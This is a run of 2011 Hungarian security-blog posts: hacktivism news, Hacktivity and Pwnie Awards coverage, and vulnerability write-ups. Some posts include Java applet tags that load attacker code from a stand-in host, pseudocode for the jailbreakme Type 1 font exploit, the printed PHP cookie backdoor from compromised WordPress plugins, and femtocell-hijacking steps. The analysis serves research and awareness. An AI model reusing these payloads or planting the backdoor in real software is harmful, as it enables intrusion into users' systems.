A brit rendőrség szerint a londoni események alakulásában jelentős szerepet játszott a RIM BlackBerry Messenger szolgáltatása, melynek segítségével az utcára vonulok titkosított csatornán kommunikálhattak egymással. A RIM a rendőrség felvetésére közölte, hogy együtt kíván működni a hatóságokkal a zavargók kézrekerítésében.

Ennek hatására a TeaMp0isoN néven már rég óta tevékenykedő kiddie banda bemászott a hivatalos BlackBerry blogra, és egy üzenetet helyezett el rajta. Eszerint a csapat megszerezte a RIM alkalmazottak adatait tartalmazó adatbázisát, melyet nyilvánosságra fognak hozni, amennyiben a cég valóban együttműködik a rendőrséggel.

Amellett, hogy a deface-mágusok érvelése elég zavaros, valószínűleg a RIM sem fog túlzottan meghatódni attól, hogy néhány kolléga címe kikerül az internetre. Azt minden esetre érdemes megjegyezni, hogy a való élet konfliktusai ma már könnyen átterjedhetnek az online világra is, ezért nem árt, ha mindenki frissíti az internetre néző szolgáltatásait, mielőtt nyilatkozatokat tesz.

Szépen alakul az idei Hacktivity programja. A szervezők érezhetően ráfeküdtek a külföldi erők bevonására, ami jó lehetőséget ad arra, hogy rátegyük az ujjunk a nemzetközi ütőérre. Mivel a vendégelőadók közül szinte mindenkit érdemes lenne kiemelni, ezért inkább nem emelek ki senkit, úgyis mindenki megtalálja a számára kedves témát a kiberbűnözés gazdasági-politikai hatásaitól a Linux kernel megerősítéséig. Ha pedig tetszett egy prezentáció, ne szégyelljétek meghívni az előadót egy italra, a magyar vendégszeretet jegyében! :)

Persze ne feledkezzünk meg hazánk fiairól se!  Jó látni, hogy a nemzetködiesedés mellett Szőr Péter (A vírusvédelem művészete című könyvéről írt ajánlómat itt olvashatjátok) lesz a keynote előadó - érdemes lesz korán érkezni! Aki a múltkori lockpicking workshopot balga módon kihagyta, most majd Subecz Ákosnak és Zánthó Csabának köszönhetően pótolhat, és ha minden jól megy, külön kis helyszín lesz a zárak egész napos pickelgetéséhez is. Szintén örvendetes hungarikum az átlátszó.hu-ról szóló beszélgetés, ami talán még a hazai hacktivizmust is felélesztheti majd. Technikaibb vizekre evezve Balázs Zoli előadását semmiképpen sem ajánlom azoknak az üzemeltetőknek, akik jól szeretnének aludni a hét végén. A BeEF-legújabb webes támadások kombináció elég ütős másfél órának ígérkezik, afelől pedig nincs kétségem, hogy Kabai Andris rá fog tenni erre még egy lapáttal az alacsonyabb szintekért rajongók kedvéért - kár hogy minderre csak a konferencia legvégén fog sor kerülni :(

Persze minden valamirevaló geek vágyik az interaktivitásra, ezért természetesen lesznek játékok is: a konferencia közben folyamatosan pörögni fog a wargame, amiben a szokásos, tisztán webes bemelegítők után mindenki megmutatja, hogy mennyivel több valós konfigurációt utánzó szervert tud rootra ütni egy évvel ezelőtthöz képest :)

Akinek pedig ez sem elég, az már most nevezhet a Capture the Flag játékra, ahol igazán könnyfakasztó feladatokkal várjuk a legkeményebb arcokat! Ez a játék idén két fordulós lesz, egy online selejtezőt követően a legjobb 10 csapat (max. 3-3 fő) a Hacktivity-n mérheti össze tudását.

Készüljetek, nevezzetek, a Hacktivity-n találkozunk!

A las vegaasi Black Hat-en kiosztották az idei Pwnie-díjakat, íme a nyertesek:

Mindenek előtt különösen nagy örömömre szolgál arról tudósítani, hogy az életműdíjat idén hazánk fia, pipacs/PaX Team nyerte. Engedjétek meg, hogy a zsűri szavait idézzem:  

Idén az életműdíjat meglepő módon olyas valaki kapja, aki rengeteget adott hozzá a biztonság defenzív oldalához. A győztes mindvégig a színfalak mögött alkotott, elkerülve a konferenciák forgatagát, megőrizve személyes és intellektuális feddhetetlenségét.

Szakmai munkájának mérhetetlen hatása van a biztonságra: Ötletei alapjául szolgálnak az utóbbi évek jelentős operációs rendszereiben alkalmazott bizonsági fejlesztéseknek, és közvetetten formálták a modern memória-korrupciós támadási technikákat is. Manapság nem lehet komolyan venni azt a támadót, aki nincs képben azokkal a védelmi módszerekkel kapcsolatban, melyekhez győztesünk tört utat.

Egy olyan környezetben, ahol a Microsoft 200 ezer dollárt fizet a támadások hatását mérséklő módszerekért [erről még lesz szó], hogy aztán kisajátítsa és szabadalmaztassa azokat, ő mindig szabadon megosztotta ötleteit - erre intellektuális nyitottsága, de az alázatosság és a mások ostobasága feletti hitetlenség gyengéd keveréke is késztette.

Mindezek mellett újításai már első pillanatban nagy hatást gyakoroltak: első bemutatásuk után hosszú időre megnehezítették más hackerek hackelését, megszűntetve a hackerek kedvenc időtöltését - a belharcot - és biztosítva, hogy inkább ártatlan harmadik felek legyenek meghackelve.

Az idei életműdíj nyertese pipacs/PaX Team, a PaX megalkotásáért, azért, hogy életet adott az ASLR-nek, hatást gyakorolva minden modern operációs rendszerre, és végül, de nem utolsó sorban, azért, hogy bepatch-elt egy mp3 lejátszót és egy tetris klónt a softICE-ba. 

Gratulálunk!

A legjobb szerver oldali hibáért járó díjat Julian Rizzo és Thai Duong kapták a .NET Padding Oracle hiba felfedezéséért.

Nem nagy meglepetés, hogy a legjobb kliens oldali hibáért Comex-et jutalmazták a JailBreakMe.co exploitjáért.

A legjobb jogosultságkiterjesztésre alkalmas hiba felfedezéséért járó díjat Tareji Mandt kapta, amiért több mint 40 objektum-zárolással kapcsolatos problémát talált a Windows kernelben.

A leginnovatívabb kutatásért járó díjat Piotr Bania kapta, amiért a pax-future.txt-ben leírtak egy részét implementálta Windowson, statikus analízisből kiindulva, a drivereket automatikusan átírva, és megtartva a kompatibilitást egy sor Windows változat között.

A legbénább gyártói válaszért az RSA Inc-t jutalmazták a SecurID incidens elbagatelizálásáért.

Az "Epic 0wnage" kategória győztese a Stuxnet, amivel kapcsolatban már a sarki zöldséges is szakértő.

Azon pedig azt hiszem senki nem lepődik meg, hogy legepikusabb FAIL-t idén a Sony produkálta és a legjobb dal is GeoHot Sony rapje lett:

Scott Anyó küldte az alábbiakat a rohej.hu-ról, ahol néha-néha elfelejtik autentikációhoz kötni az adminisztrátori funkciókat:

A regisztrált felhasználók jól teszik, ha nem használják az itteni jelszavukat máshol!

Természetesen még a múlt héten megpróbáltam jelezni a problémát a kapcsolatfelvételi űrlapon, amely az alábbi szellemes szöveggel nyugtázta az üzenet vételét:

Köszi az őszinteséget, én viszont nem szeretek a /dev/null-al levelezni. Bocs! 

Folytatódik a Pwnie jelöltek bemutatása, ezúttal a kliens-oldali kategória legnagyobb esélyese, Comex jailbreakme.com exploitja kerül röviden elemzésre. Ahogy azt a legötbben tudják, pusztán a jailbreakme.com oldal meglátogatásával el lehetett tüntetni a gyártói korlátozásokat az iOS 4.3.3-as verzióját futtató eszközökön. Ehhez Comex két hibát használt ki: egy, a MobileSafari PDF feldolgozóját érintő problémát, és egy nem megfelelő típuskonverzióból adódó sebezhetőséget a kernelben. Az exploitok létrehozásához használt kódokat nem rég publikálták, a Sogeti pedig részletesen kielemezte a PDF sebezhetőség kihasználásához alkalmazott módszereket, én is ez alapján igyekszem összefoglalni utóbbi exploit szépségeit.

Ahogy az a hibajegyből is kiderül, a PDF olvasó a FreeType betűkészletek, konkrétabban az Adobe Type 1 font programok feldolgozásakor hibázik. Ezek a "programocskák" mondják meg a PDF megjelenítőnek, hogy hogyan kell kirajzolni az egyes karaktereket.

A problémát a callothersubr Type 1 parancs okozza, amely PostScript szubrutinhívást végez. Ehhez paraméterül kapja a szubrutin nevét, argumentumait, és az argumentumok számát. Az argumentumszám negatívra állításával viszont elérhető, hogy a stack pointer az interpreter stackjén kívülre mutasson! 

Az interpreter stackje egy T1_DecoderRec_ (ezt ajánlott megnyitni új lapon) struktúra adattagjaként jelenik meg a memóriában. A fenti hiba kihasználásával ennek a struktúrának a tartalma manipulálható, ezen kívül minden Type 1 program hozzáfér a sebezhető t1_decoder_parse_charstrings függvény x és y változóihoz. Az írás/olvasás műveletek azonban nem végezhetőek el közvetlenül, csak a Type 1 interpreteren keresztül, melynek utasításai csak korlátozott mozgásteret biztosítanak. Comex ennek ellenére sikeresen összegyűjtött néhány olyan utasítást, mellyel tetszőleges kódfuttatást érhetett el. Az adathozzáférés a következő parancsok felhasználásával történik:

• push: Konstans stack-re írása. A SP ellenőrzésre kerül végrehajtás előtt
• setcurrentpoint: Két szó beolvasása a stackről az x és y változókba. A SP nem kerül ellenőrzésre
• callothersubr #00: Az x és y változók stackre írása. A SP nem kerül ellenőrzésre, viszont a dekóder struktúrában flex_state!=0 && num_flex_vectors==7 -nek kell fennálnia a végrehajtáshoz
• callothersubr #42: A hibát triggerelő szubrutin-hívás
• hstem3, hmoveto, unknown15: SP állítás
• callothersubr #12: SP visszaállítása a stack tetejére
• callothersubr #20 és #21: Stacken lévő értékek összeadása és kivonsása
• callothersubr #23 és #24: Szavak írása a dekóder struktúra buildchar adattagjába

A dekóder struktúra egy adattagjának (valójában két szavának) beállítása így történhet:

push 1
push 2
setcurrentpoint ; x=1, y=2
; ... 8 parancs a callothersubr #0 előfeltételeinek beállításához ...
push 0xfxxxxxxx ; Egy negatív szám
push 0x2a    ; 42
callothersubr ; hiba triggerelés, SP átállítás
; Ha itt push-olunk, már a stacken kívülre írunk!
; Úgy kell beállítani az SP-t, hogy 0-ra mutasson,
; vagy ne legyen probléma a push 0
callothersubr ; x és y stackre írása, az átállított SP szerint

Emellett természetesen szükség lehet memória olvasásra, aritmetikára, feltételes végrehajtásra, stb. Az élet tehát nem egyszerű, de Comex megoldotta - a hibakihasználás lényegében három lépcsőben zajlik:

1. A T1_DecoderRec->parse_callback függvény pointer kiolvasása - Ennek alapján határozható meg az ASLR miatti címeltolás, valamint az, hogy éppen 4-es vagy 3GS típusú iPhone-on fut-e a program - a különböző készülékgenerációkban ugyanis más sorrendben helyezkednek el a betöltött könyvtárak, így két szimbólum címének összehasonlításával megállapítható a konkrét típus.
2. ROP lánc generálás a készülék típusának megfelelően - A ROP stack a T1_DecoderRec->buildchar adattagban épül fel, ennek segítségével lesz kihasználva a jailbreakhez szükséges kernel hiba.
3. Vezérlés átadása a T1_DecoderRec->parse_callback()-en keresztül - Stack pivoting és a parse_callback beállítása az első ROP gadgetre

Ezeknek a lépéseknek a végigjátszása x86-on sem lenne gyerekjáték, a fent vázolt "furcsa gépet" programozva pedig egyszerre tűnik gyönyörűnek és hátborzongatónak a feladat. A GitHubon jól látszik, hogy a mű megalkotásához (ide értve a kernel exploit összegyógyítását is) nagyjából egy éven át kellett nyúzni az iOS-t, de az eredmény magáért beszél: a jailbreakme.com-ot használva több (tíz?)ezren vehették át az irányítást kütyüik felett, lényegében készülékfüggetlenül, megbízhatóan, egyetlen szokatlan parancs begépelése nélkül.

A Google és a Mozilla után egy újabb internet-óriás döntött úgy, hogy anyagilag is elismeri a szolgáltatásaiban hibákat kereső, és azokat etikusan kezelő hackerek munkáját. A Facebook már eddig is fenntartott egy dicsőségfalat a "felelősségteljes" hibajelentést gyakorló szakértők számára, mostantól pedig (nagyából) 500$ jutalmat ad minden, a Facebook alapszolgáltatásaival kapcsolatban bejelentett biztonsági hibáért. A szolgáltatás jellegéből adódóan az olyan, többnyire elhanyagolt hibatípusok is játszanak, mint a XSS vagy a CSRF, a külső szolgáltatónál futó alkalmazások (http://apps.facebook.com/...) hibáiért viszont nem fizet a cég (rámenne a gatyájuk is...).

Bár biztosan lesznek olyanok, akik keveslik majd a felajánlott "vérdíjat" (mint a Google és a Mozilla esetében is), a lépés mindenképpen figyelemre méltó gesztus, ami jelzi, hogy a felhasználói visszajelzések biztonsági szempontból is értéknek tekintendők. A PTA CERT-Hungary negyedéves kiadványában éppen most jelent meg egy írásom, ami ezt a kérdéskört taglalja - remélhetőleg ez is hozzájárul majd valamelyest, hogy a konstruktív szemlélet itthon is elterjedjen!

Az iOS 4.3.5-ös illetve 4.2.10-es verzóiban egy olyan X.509 tanúsítványok kezelésével kapcsolatos problémát javítottak, melynek első változatát kilenc éve az Internet Explorerrel kapcsolatban fedezte fel Moxie Marlinspike. A probléma oka, hogy az operációs rendszer tanúsítványkezelő API-ja nem ellenőrzi a tanúsítványlánc köztes tagjainak ún. Basic Constraintjeit, melyek jelzik, hogy az adott tanúsítvány tulajdonosa rendelkezik-e CA jogkörrel. Ennek következtében ha az attacker.com domain tanúsítványát az iOS számára elismert szervezet, pl. a VeriSign hitelesítette, a domain tulajdonosa kiállíthat tetszőleges domainre, pl. a paypal.com-ra érvényes tanúsítványokat, melyeket a frissítetlen iOS-es eszközök úgy fognak elfogadni, mintha azokat a VeriSign hitelesítette volna.

Levent Kayan a Skype után most az ICQ üzenetküldőben talált XSS hibát, melyen keresztül ellophatók a csatlakozó kontaktok munkamenet azonosítói. A közzétett leírás szerint a Skype esetéhez hasonlóan a profil adatokbaszúrt kliens oldali kódok nincsenek megfelelően szűrve - hiába, a fejlesztők hajlamosak ugyanazokat a típushibákat elkövetni, a bugvadász dolga néha csak a minta követéséből áll.

Kayan ezen kívül az ICQ weboldalán is talált perzisztens Cross-Site Scriptinget, melyet minimális social engineeringgel kombinálva szintén átvehető az irányítás idegen ICQ fiókok felett.

Kicsit szégyellem magam emiatt a gagyi XSS-es poszt miatt, mivel annyi fincsi téma vár még feldolgozásra, de kiesik a szemem a sok monitorbámulástól, szóval egy kis türelmet kérnék...

Lezárult az idei Pwnie Awards nevezési időszaka, a hivatalos weboldalon megtekinthetők a jelölések. Az idei mezőny igen erős, és bár a szervezők kommentjei önmagukban is megérnek egy misét, érdemes végignézni a jelölteket részletesebben is. Néhányukról már volt szó, az elkövetkező napokban-hetekben igyekezni fogok írni azokról a szebb darabokról is, melyek eddig kimaradtak a szórásból.

Elsőként vegyük Frédéric Hoguin Java exploitját, ami pusztán a Java beépített lehetőségeit kihasználva ad kódfuttatásra lehetőséget aláíratlan Java appleteken keresztül:

A probléma gyökere az, hogy az <applet> tagek code attributumában a betöltendő osztály nevét meghatározó karakterláncban megadható egy teljes URL is, a futtatókörnyezet azonban a codebase attributumban megadott URL biztonsági paramétereivel futtatja le azt. Mivel a Java appletek alapértelmezetten egy elég kevés lehetőséget adó homokozóban futnak, kell találni egy olyan kódbázist, ami mindig megbízható a JRE számára. Szerencsére a Java telepítési könyvtárában a lib/ext útvonal pontosan egy ilyen megbízható kódbázist jelöl, így a 

<applet codebase=”file:C:\Program Files\Java\jre6\lib\ext” code=”http://attacker/AttackerCode” /> 

Taggel megadott applet bármit megtehet a kliens számítógéppel a Java-t futtató felhasználó jogkörében. A baj csak az, hogy a code attributumban minden . karakter /-re alakítódik, így több szintű domain nevek illetve IP címek esetén bajban leszünk. Még szerencse, hogy a JRE elfogadja az IP címeket ún. numerikus notációban is: ekkor az IP cím byte-jait egy egyész számmá összefűzve értelmezzük, így például a 192.168.0.1 címből a 3232235521 szám lesz. Ezt megadva hosztként tetszőleges címről betölthetünk Java osztályokat, melyek aztán hozzáférhetnek a fájlrendszerhez, folyamatokat indíthatnak, nyers hálózati kapcsolatokat nyithatnak, stb.:

<applet codebase=”file:C:\Program Files\Java\jre6\lib\ext” code=”http://3232235521/AttackerCode” />

Az Oracle a Java 1.6.0_24 kiadásával javította a problémát idén februárban.

"Nektek mindig szerencsésnek kell lennetek, nekünk elég csak egyszer!" - Egy hét múlva hívjuk meg egy sörre azt a rendszeradminisztrátort, akinek utoljára fejtörést okoztunk! 

Időpont: 2011. 07. 29. péntek, kapunyitás: 15 óra 

Helyszín: Városligeti Sörsátor, 1146 Budapest, Városligeti krt.1, 

A rendszeradminisztrátorok elismeréséért tizenkét éve küzd a sysadminday.com, kezdeményezésükre minden év júliusának utolsó péntekén világszerte megtartják a rendszeradminisztrátorok megbecsülésének napját. 

A rendszeradminisztrátorok gondoskodnak a munkahelyek informatikai eszközparkjának zökkenőmentes működéséről, legyen szó nagyvállalati szerverekről vagy irodai alkalmazásokról. Ők azok, akik bármikor rendelkezésre állnak, hogy megoldjanak bármilyen felmerülő technikai problémát, és ők azok, akik mindezek ellenére láthatatlanok maradnak, munkájuknak gyakran alulértékelt, cégen, illetve a mindennapokon belül pedig alaptalan sztereotípiákról élnek róluk, ahogy például ez a népszerű brit komédiasorozatból, a The IT Crowdból is kiderül.  

Idén a hazai IT médiapiac két meghatározó szereplője, az IDG és a HWSW-HUP egy nagyobb rendezvényt álmodott meg. A rendezvény célja, hogy az informatikai infrastruktúra üzemeltetőinek a kedvében járjon, rombolja a mindennapokban róluk kialakult káros és alaptalan sztereotípiákat. A szervezők nem titkolt célja az sem, hogy a cégek felismerjék, milyen fontos célcsoport a rendszeradminisztrátor, hiszen igen jelentős döntéshozó és döntés -előkészítő potenciállal rendelkeznek mind a KKV, mind a nagyvállalati szegmensben, egyszersmind szeretnénk leszámolni azzal a divatos sztereotípiával, hogy a rendszergazda semmiben nem dönt, de bármit „megfúr”. 

A szervezők keresik azokat a cégeket, szervezeteket, akik ki szeretnék fejezni megbecsülésüket a cégüknél dolgozó rendszergazdák iránt. Arra kérik a cégvezetőket, hogy tegyék lehetővé rendszergazdáiknak a részvételt a rendezvényen. Azon cégek, melyek kifizetik munkatársaik belépődíját, felkerülnek a rendezvény dicsőségfalára. A belépődíj személyenként mindössze 1000 forint. 

További információk a programról és regisztráció: http://sysadminday.hu/

SGHCToma írt egy remek kis értekezést a Windows LoadLibrary API-jának return-oriented-programming során történő alkalmazásáról, demonstrációként pedig készített egy példa exploitot a 3DStudioMax-hez. A megoldás elegáns és helytakarékos, jó példája annak, hogy a jól bevált, éppen ezért unalomig ismételt technikák továbbgondolására mindig érdemes egy kis energiát fordítani.

Levent Kayan perzisztens Cross-Site Scripting hibát fedezett fel a népszerű kommunikációs szoftver aktuális verzióiban. A felhasználói profil mobil telefonszám mezőjének szűrése nem megfelelő, így az ide helyezett kliens oldali szkriptek a profilinformációk frissülése után minden bejelentkezéskor lefutnak a rosszindulatú felhasználó ismerőseinek számítógépén. 

A hiba alapvetően a Skype szolgáltatáson belüli parancsvégrehajtásra adhat lehetőséget, de egy hasonló támadás nem régiben az operációs rendszer fájljaihoz is hozzáférést engedett a same-origin policy figyelmen kívül hagyása miatt - ez utóbbi hibát azóta már javították (thx woFF!).

A Skype egyelőre nem reagált a hírekre.

A Skype (Microsoft?) megerősítette a probléma létezését, javítást jövő hétre ígérnek. Szerintük  a probléma kevésbé súlyos, mivel a rosszindulatú kód csak akkor fut le, ha a támadó az áldozat gyakori partnerei között szerepel, valamint a beszúrt kódokkal követlenül nem lehet parancsokat végrehajtani az alkalmazásban.

Régen hallatott magáról a német THC csapat, eddig úgy tűnik az Egyesült-Királyságban forgalmazott Vodafone femtocellák reverse engineeringjével voltak elfoglalva. A most publikált wikiben részletesen elemzik az eszköz felépítését és interakcióit a hálózat többi komponenségvel.

A leírás szerint a beágyazott Linux operációs rendszeren root jogosultság szerezhető egy kis forrasztgatás után soros konzolon keresztül. A rendszergazdai jogosultság birtokában leállíthatjuk a beépített tűzfalat ls telepíthetjük saját publikus kulcsainkat, így később SSH-n is bejelentkezhetünk az eszközre. 

A szolgáltató hálózat felé irányuló kommunikáció megfigyelésével ezután megszerezhetők a csatlakozott mobil készülékekhez tartozó titkos kulcsok, melyek birtokában a készülékek kommunikációja lehallgatható, nevükben hívások kezdeményezhetők, SMS-ek küldhetők stb. Egy kis hálózati tunnelezéssel még a roaming díjak is megspórolhatók. 

A THC leírása arra is pontos instrukciókat ad, hogy hogyan lehet eltávolítani a femtocella helyzetmeghatározó modulját, illetve hogyan lehet kikapcsolni a szolgáltató felé irányuló figyelmeztetések küldését, így a hackelés teljesen észrevétlen maradhat.

A wiki egyes részei még hiányosak, de mivel a Vodafone itthon is forgalmaz femtocellákat, elméletileg megvan a lehetőség a lyukak betömésére :)

Frissítés:

A Vodafone tagadja a probléma létezését, bár a levél megfogalmazása alapján nem biztos, hogy ugyanarról beszélnek, mint a THC. A közlemény szövege szerint egy olyan hibát foltoztak még 2010-ben, ami illetéktelen hozzáférést biztosított a femtocellához egy idegen támadó számára, most azonban az eszköz jogos tulajdonosa az, akivel szemben védekezni kellene. Másrészt a THC arra is kitér, hogy miként lehet kikapcsolni az automatikus frissítéseket az eszközön, így a foltozás csak a szűz állomásokon segíthet.

Frissítés 2:

A THC reagált a Vodafone közleményére. A hackercsoport szerint a Vodafone valóban javított egy hibát, melyen keresztül adminisztrátori hozzáférést lehetett szerezni az eszközökön, azonban a probléma gyökere nem ez, hanem hogy a femtocella a 3G/UMTS biztonsági ajánlásaival szembemenve csatlakozik a szolgáltatói hálózathoz. Idő közben persze kiderült, hogy az új védelem is megkerülhető. 

Emellett a THC azt is közölte, hogy olyan előfizetők titkos kulcsaihoz is sikeresen hozzáfértek, melyek nem kapcsolódtak a kiszuperált femtocellákhoz. Ennek az oprátort érintő támadásnak a részleteiről feltehetően a BlackHaten lehet majd hallani.

Frissítés 3:

Az ITCafé megkereste a Vodafone hazai képviseletét, akiktől a következő válasz érkezett (kiemelés tőlem):

"A Vodafone sajtóosztályán elmondták, a Vodafone Magyarország ügyfelei és adatai teljes biztonságban vannak, mert az idén áprilistól a Vodafone-tól megvásárolható hazai femtocell megoldás, a Vodafone Mini Bázis a legfrissebb, feltörhetetlen szoftverrel rendelkezik. 

Az esetleges feltörhetőségre vonatkozó állítások nem igazak, mert azok egy 2010 elején Nagy-Britanniában Sure Signal néven forgalmazott  femtocella-technológián alapuló készülékre vonatkoztak, s a problémát még annak idején 2010-ben néhány hét alatt a Vodafone UK szakemberei biztonsági frissítéssel teljes mértékben kiküszöbölték."

Aha, szóval feltörhetetlen, akkor nincs baj :) A viccet félretéve úgy látszik, hogy itthon is ugyanaz a hardver fut, azzal a 2010-ben frissített szoftverrel, melynek védelme a THC szerint még mindig megkerülhető.

A júliusi kánikulában a Microsoft szerencsére nem sok izzadásra ad okot:

MS11-053: Ha Harry Potter hacker lenne, Bluetooth lenne a varázspálcája. Windows 7-en és Vistán ugyanis a kékfog stack hibája "nem túl távoli" kódfuttatást tesz lehetővé - a driver hibájának kihasználásához ugyanis az operációs rendszer által kezelt Bluetooth eszközök rádiós hatósugarában kell tartózkodni. Szépséghiba a történetben, hogy az SRD blog szerint ennek a kernel módú "use-after-free" hibának a kihasználásához tényleg varázsolni kell.

MS11-054: Ez a patch nem kevesebb mint 15 driver hibát javít minden támogatott Windows rendszerben. A hibák jogosultságkiterjesztésre adhatnak lehetőséget.

MS11-055: DLL injection hiba a Visio 2003-ban, nem kell tőle hanyatt esni.

MS11-056: Öt jogosultságkiterjesztésre alkalmat adó hiba javítása, egy kis csavarral. Windows XP-n és Vistán a Client/Server Runtime Subsystem (CSRSS) hibája SYSTEM szintű kódfuttatásra ad lehetőséget a Console API-n keresztül. Windows 7-en és Server 2008-on viszont az érintett kód egy külön, a bejelentkezett felhasználó nevében futó folyamatba került, azonban még ebben az esetben is elképzelhető, hogy egy szűkebb jogkörrel rendelkező felhasználó egy másik, magasabb jogosultságú felhasználó folyamatán keresztül futtasson kódot. A hibákról részletes elemzést olvashattok itt.

Nem olyan régen volt szerencsénk kliens oldali teszteket végezni egy cselesen kialakított környezetben. Bár a kódfuttatás elérése után már általában viszonylag egyszerű dolga van az embernek, ebben az esetben a többszintű védelmi megoldásoknak köszönhetően izgalmas játékokra nyílt lehetőségünk. Úgy gondoltuk, hogy a tapasztalatokból más is tanulhat, így hát írtunk egy összefoglalót az alkalmazott trükkökről.

Az doksi letölthető innen.

+++

Lazán kapcsolódó téma: Itt és itt olvasható egy-egy érdekes összefoglaló arról, hogy több népszerű biztonsági termékben nem alkalmazzák a rendelkezésre álló hardening technológiákat, ezért előfordulhat, hogy éppen a védelemért felelős szoftver könnyíti meg valamilyen szoftverhiba kihasználását. 

A vsftpd hivatalos honlapjáról elérhető 2.3.4-es verzió kódjába támadók hátsó kaput helyeztek. Amennyiben a preparált szoftvernek FTP bejelentkezéskor a :) felhasználónevet adjuk meg, bind shell nyílik a kiszolgáló 6200-as portján. A módosított szoftver nem jelzi a gazdájának, hogy telepítették. A teljes diff itt olvasható.

A GPG aláírás ellenőrzésekor a turpisság természetesen kiderül. A csomagok mostantól egy biztonságosabbnak tartott mirroron is elérhetők. 

Egy hosszú ideje hiányolt funkció jelent meg a Metasploit keretrendszer fejlesztői ágában. Valójában már a cím beírása közben is kellemes bizsergést éreztem, hiszen biztos vagyok benne, hogy a HTTP-n illetve HTTPS-en visszacsatlakozni képes Meterpreter payloadnak még sokszor fogjuk jó hasznát venni minden fajta szanaszét tűzfalazott/proxyzott vállalati környezetben. 

Az új fejlesztés mindent tud, ami elvárható: Az áldozat gépén lefutó kód automatikusan az érvényes proxybeállításokat és alapértelmezett autentikációs módot alkalmazva, akár titkosított HTTP csatornán csatlakozik vissza a DNS-en keresztül azonosított támadóhoz, hogy letöltse a Meterpreter DLL-jét, sikertelenség vagy szakadó kapcsolat esetén pedig megadott ideig újrapróbálkozik. 

A cucc állítólag Tor-on keresztül is működik, úgy is, ha a kommunikáció során változnak az exit node-ok. Én a kompatibilitás ellenőrzésére egy egyszerű Windows 7-es kapcsolatot sikerrel teszteltem, remélem lesz időm megnézni kicsit alaposabban a hálózati kommunikációt is. Az első HTTP stage mérete 348, a HTTPS-es változaté 368 byte.

A fejlesztés az alkotók szerint új alapokra helyezte a MSF payload-ok működését, erre alapozva a jövőben IRC-n, vagy akár Pastebin-en (!) is kommunikálhatunk az irányításunk alá vont gépekkel. Köszönjük srácok! :)

Lazán kapcsolódó téma, de az antivírusok kikerülésének problémájáról itt van egy jó összefoglaló.

A blog lassan négy éves történetében eddig nagyjából száz "gray-hat" hibajelentést juttatam el kisebb-nagyobb cégeknek. Meggyőződésem, hogy ezzel minden esetben sikerült hozzájárulnunk - többes szám, hiszen a hibajelzések általában tőletek érkeznek, kedves olvasóim! - ezen rendszerek biztonságosabbá tételéhez. 

Az utóbbi időben azonban felhívták a figyelmemet, hogy a háttérben mindez egyes esetekben olyan folyamatokat indít el, amely velem együtt a munkatársaimat, barátaimat és persze titeket is igen kellemetlen helyzetbe hozhat. Sajnos a pozícióféltés néha háttérbe szoríthatja a jó szándékot. Nincs mit tenni, emberből vagyunk. Ennek eredményeként el kellett gondolkoznom azon, hogy megéri-e mindez nekem, nekünk. 

Ti mit tennétek például, ha egyszer csak beesne a postaládátokba egy üzenet, mely szerint egy egészségügyi szoftverből a szomszéd néni is ki tudja olvasni az összes páciens teljes kórtörténetét, de ha szóvá teszitek a dolgot, könnyen eljárás indulhat ellenetek? 

A legegyszerűbb megoldás természetesen, hogy jó szokás szerint mélyen hallgatunk a dologról: nem szól szám, nem fáj fejem. Egyszer vagy eladja valaki az adatbázist a szervkereskedőknek, vagy nem, reméljük a legjobbakat. Vagy mi lesz akkor, ha valaki elkezd kis magyar LulzSec-et játszani, és egyszeri honfitársaink legnagyobb privacy aggodalma többé nem a Facebook lesz? 

Szeretném megadni legalább a lehetőséget arra, hogy ne így alakuljanak a dolgok, de jószándék ide vagy oda, úgy látszik a karmapisztoly visszafele is elsülhet sőt, az sem biztos, hogy csak "én kapok golyót". Így hát nem tudom mitévő legyek...

A WordPress figyelmeztetést adott ki, mely szerint három népszerű pluginban is jól elrejtett hátsó kaput fedeztek fel. Az érintett kiegészítők az AddThis, a WPTouch és a W3 Total Cache, a hátsóajtók jellegéről nincs információ. A blogszolgáltató még vizsgálja, hogy esetleg más pluginekhez is hozzáfértek-e a támadók - azt biztosra veszik, hogy a rosszindulatú módosítások külső féltől származnak, de nem tudják, hogyan sikerült illetéktelenül hozzáférést szerezni a tárolókhoz. 

A három kiegészítő kódját a legutóbbi ismert legitim állapotba állították vissza, és az összes WordPress.org, bbPress.org és BuddyPress.org felhasználónál kényszerítik a jelszóváltoztatást. Egyúttal figyelmeztetnek, hogy aki az utóbbi napokban plugint telepített vagy frissített, az jól teszi, ha nagyobb figyelmet szentel a rendszere biztonságának.

Friss:

A Securi csapata megvizsgálta az érintett pluginokat, és a következő backdoort találták:

if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))  

                $this->desired_view = $matches[1].$matches[2]; 

Tehát a plugin ellenőrzi egy süti meglétét, egyezés esetén pedig a sütiben tárolt értékeknek megfelelően hajt végre egy függvényt. A trükk az, hogy a függvény neve (és a paraméter) is egy reguláris kifejezés illeszkedéseit tartalmazó változóban jelenik meg, valamint a futtatás és az ellenőrzés is egy if feltételben történik (a törzs már lényegtelen).

Depth jóvoltából itt van az idei Defcon CTF selejtező RR300-as pályájának megoldása és egy kis ráhangolás Hacktivity-re :)

Szerencsére a Defcon selejtezőn nem csak Földtől teljesen elrugaszkodott feladatok szerepeltek. Depth a Retro Revisited feladatoknak ment neki, és miután a 100-as pályán szereplő "____-___-______" rejtélyes kérdésre ördögi logikával megadta a helyes választ (hack-the-planet), lezúzta a 200-as és a 300-as szinteket is. Alant a 200 pontot érő pálya megoldása olvasható:

Egy 1998-ban bekerült hibát javított az OpenWall projekt a népszerű John the Ripper jelszótörőben. Mint kiderült a probléma más alkalmazásokat is érinthet, a nyílt-forrású implementáció ugyanis helytelenül kezeli a 8-bites karaktereket, előjelbitként értelmezve az MSB-t.

Ennek következtében a legnagyobb helyiértéken 1-est tartalmazó karakter előtti oktett(ek)et az algoritmus nem veszi figyelembe, vagyis azonos hash értéket eredményezhet két különböző bemeneti byte-sorozat is!

A probléma Solar Designer szerint érintheti többek között a PHP-t, valamint az Owl, ALT és SuSE Linux disztribuciókat is.

Egy kódfrissítés következtében tegnap 4 órán keresztül hozzá lehetett férni tetszőleges felhasználó Dropbox fiókjához, tetszőleges jelszóval. A problémát az egyik kísérletező kedvű felhasznáó jelezte. A cég szerint a kérdéses időszakban a felhasználók 1%-a jelentkezett be, a gyanús tevékenységek felderítése még tart - kérdés, hogy pl. a fájlok fel- és letöltése gyanús tevékenységnek számít-e a Dropboxon :P

Ja, ez majdnem lemaradt:

